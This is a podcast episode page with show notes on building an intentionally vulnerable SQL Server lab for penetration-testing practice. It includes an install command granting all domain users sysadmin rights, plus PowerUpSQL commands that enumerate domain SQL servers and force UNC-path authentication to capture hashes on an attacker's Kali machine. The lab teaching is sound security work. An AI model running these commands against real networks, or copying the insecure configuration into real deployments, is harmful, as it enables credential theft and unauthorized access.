7MS #567: How to Build an Intentionally Vulnerable SQL Server

April 14, 202339m 8s

Audio is streamed directly from the publisher (traffic.libsyn.com) as published in their RSS feed. Play Podcasts does not host this file. Rights-holders can request removal through the copyright & takedown page.

Original episode page

Show Notes

Hey friends, today we're talking about building an intentionally vulnerable SQL server, and here are the key URLs/commands talked about in the episode:

Download SQL Server here
Install SQL via config .ini file
Or, install SQL via pure command line
Deploy SQL with a service account while also starting TCP/IP and named pipes automagically:

setup.exe /Q /IACCEPTSQLSERVERLICENSETERMS /ACTION="install" /FEATURES=SQL /INSTANCENAME=MSSQLSERVER /TCPENABLED=1 /NPENABLED=1 /SQLSVCACCOUNT="YOURDOMAIN\YOUR-SERVICE-ACCOUNT" /SQLSVCPASSWORD="YOUR PASSWORD" /SQLSYSADMINACCOUNTS="YOURDOMAIN\administrator" "YOURDOMAIN\domain users"

Run PowerUpSQL to find vulnerable SQL servers:

$Targets = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 | Where-Object {$_.Status -like "Accessible"}

Audit the discovered SQL servers:

Get-SQLInstanceDomain -verbose | invoke-sqlaudit -verbose

Fire off stored procedures to catch hashes!

Invoke-SQLUncPathInjection -verbose -captureIP IP.OF-YOUR.KALI.BOX

← All episodes of 7 Minute Security